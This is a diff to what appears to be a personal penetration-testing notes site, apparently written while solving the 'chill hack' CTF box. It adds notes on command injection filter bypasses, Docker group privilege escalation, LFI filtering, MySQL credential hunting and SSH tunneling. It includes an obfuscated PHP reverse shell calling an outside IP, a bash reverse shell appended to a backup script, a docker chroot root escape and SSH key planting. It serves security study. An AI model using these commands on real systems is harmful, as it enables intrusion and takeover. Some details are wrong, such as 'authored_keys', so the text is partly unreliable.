chill hack

content/notes/command_injection.md

@@ -0,0 +1,21 @@
+---
+title: Command Injection 💄
+---
+- Original content from [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
+
+## Filter Bypasses
+
+- Commands can be broken into parts by using a backslash (`\`):
+
+![](Pasted%20image%2020240417160455.png)
+
+![](Pasted%20image%2020240417160920.png)
+
+## What to do after obtaining one command injection?
+
+- Now you have to conveniently encode a web shell as the ones located in [Reverse shells 👾](reverse_shells.md)
+	- Example using backslash (`\`): 
+
+```shell
+ph\p -r '$sock=fsockopen("10.11.74.136",666);exec("/bin/sh -i <&3 >&3 2>&3");'
+```

content/notes/docker_hacking.md

@@ -11,3 +11,16 @@ title: Docker hacking 🐳
 ```shell
 echo "bash -i >& /dev/tcp/IP_ATTCK/PORT 0>&1" >> backup.sh
 ```
+
+## Being part of the docker group
+
+- If we find out that our victim user belongs to the docker group, we can do the following (based on [GTFObins](https://gtfobins.github.io/gtfobins/docker/)):
+
+```shell
+docker run -v /:/mnt --rm -it alpine chroot /mnt sh
+```
+
+![](Pasted%20image%2020240417222812.png)
+
+![](Pasted%20image%2020240417222753.png)
+

content/notes/lfi.md

@@ -58,3 +58,11 @@ http://IP_HOST/echo.php?search=id+|+bash
 echo.php?search=ls+|+bash
 # Then try to input a reverse shell
 ```
+
+## Web filtering
+
+If a web shell filters your input, try to encode it into `base64`
+
+![](Pasted%20image%2020240417160455.png)
+
+- If it doesn't work, try some [Command Injection 💄](command_injection.md)

content/notes/mysql.md

@@ -1,6 +1,14 @@
 ---
 title: Mysql 💟
 ---
+## Where to find credentials
+
+- Most of the times **root creds** will be stored under the `/var/www` directory, maybe in a `.php` file or something like that. Always deeply check all the files inside
+	- Inside the directory there are always the `html` directory and maybe others (where it is located the real sugar)
+
+![](Pasted%20image%2020240417220426.png)
+
+## Basic commands
 
 - To connect to a mysql database run:
 
@@ -13,7 +21,7 @@ mysql -u root -h IP -p
 - To see tables of database: `show tables;`
 - To modify a value: `update runcheck set run = 1;`
 - Now (when you inside a table) you can do: `select * from TABLE_NAME`
-
+- To quit run: `quit`
 
 - In web browser, if you find a cookie, try adding a the end of its value a `'` like:
 

content/notes/tunneling.md

@@ -0,0 +1,41 @@
+---
+title: Tunneling 🚡
+---
+## Finding out what is doing a port
+
+Quickly run:
+
+```shell
+curl localhost:9001
+```
+
+## Performing a reverse tunneling
+
+When you find a port that is only opened in localhost like:
+
+![](Pasted%20image%2020240417214309.png)
+
+you can drop a SSH key on the server and use SSH to do a reverse tunneling of the port you want to access back on our machine:
+
+```shell
+# Generate the ssh key
+ssh-keygen -f USERNAME
+```
+
+![](Pasted%20image%2020240417214633.png)
+
+Now copy the `USERNAME.pub` key into the USERNAME `.ssh` folder:
+
+![](Pasted%20image%2020240417214904.png)
+
+```shell
+cp USERNAME.pub /home/USERNAME/.ssh/authored_keys
+```
+
+Give to the SSH private key the necessary permissions and use the argument `-L` to perform a reverse port forwarding of the local port to your local box port:
+
+```shell
+chmod 400 USERNAME
+ssh -L PORT:127.0.0.1:PORT -i USERNAME USERNAME@IP_ATTACK
+```
+